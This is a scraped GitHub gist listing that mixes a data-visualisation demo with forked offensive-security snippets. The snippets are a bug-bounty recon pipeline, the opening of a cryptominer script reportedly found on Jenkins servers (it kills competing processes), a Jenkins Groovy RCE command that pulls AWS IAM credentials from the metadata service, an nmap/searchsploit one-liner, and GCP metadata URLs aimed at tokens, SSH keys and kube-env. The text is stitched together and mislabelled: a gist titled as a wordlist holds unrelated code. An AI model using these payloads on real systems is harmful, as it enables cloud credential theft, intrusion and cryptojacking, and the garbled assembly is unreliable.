Emad Shanab emadshanab

🏠
Working from home
View GitHub Profile
@emadshanab
emadshanab / doc.mkd
Created January 28, 2017 02:01 — forked from joannecheng/doc.mkd
Beyond the Bar Graph: Live coding example

Visualizing Rails Issues

Live coding demo from talk at Kod.io @ Linz 2014.

emadshanab / wordlist.txt
Created May 28, 2020 10:36 — forked from random-robbie/wordlist.txt
bruteforce wordlist for bug bounties
#!/usr/bin/env python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

# Expect exactly two arguments: the listening port and a URL.
if len(sys.argv) - 1 != 2:
    print("""
Usage: {} <port_number> <url>
""".format(sys.argv[0]))
    sys.exit(1)
gau "$1" | sort -u | grep -v oembed | grep -v '\.css' | grep -v '\.jpg' | grep -v '\.svg' | grep -v '\.png' | grep -v '\.gif' | grep -v '\.ico' | grep -v '\.mp4' | grep -v '\.eot' | grep -v '\.webm' | grep = | sed 's/http:/https:/g' | sed 's/:80//g' | sort -u | tee leads.txt
while read -r url; do gobuster -u https://"$url" -q -e -k -w content_discovery_all.txt; done < urls.txt > sub_url.txt
cut -d ' ' -f 1 sub_url.txt > /opt/parameth/params.txt
cd /opt/parameth
while read -r url; do python /opt/parameth/parameth.py -u http://"$url"; done < params.txt
emadshanab / jenkins-miner.sh
Created May 28, 2020 10:45 — forked from random-robbie/jenkins-miner.sh
Miner found on jenkins servers.
#!/bin/bash
if [[ $(whoami) != "root" ]]; then
    for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
        kill -9 $tr || : ;
    done;
fi
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);

Jenkins Groovy RCE Commands

AWS IAM ROLE KEYS

def command = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/"
def proc = command.execute()
Using nmap alongside searchsploit in Kali Linux to grab any low-hanging fruit:
nmap -p- -sV -oX 71-new.xml 10.10.10.71; searchsploit --nmap 71-new.xml
This writes the scan results to an XML file called 71-new.xml; searchsploit then reads that file via --nmap 71-new.xml and looks up the detected service versions.
chrisyoung.net
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json
http://metadata.google.internal/computeMetadata/v1beta1/project//attributes/ssh-keys
http://metadata.google.internal/computeMetadata/v1beta1/instance/hostname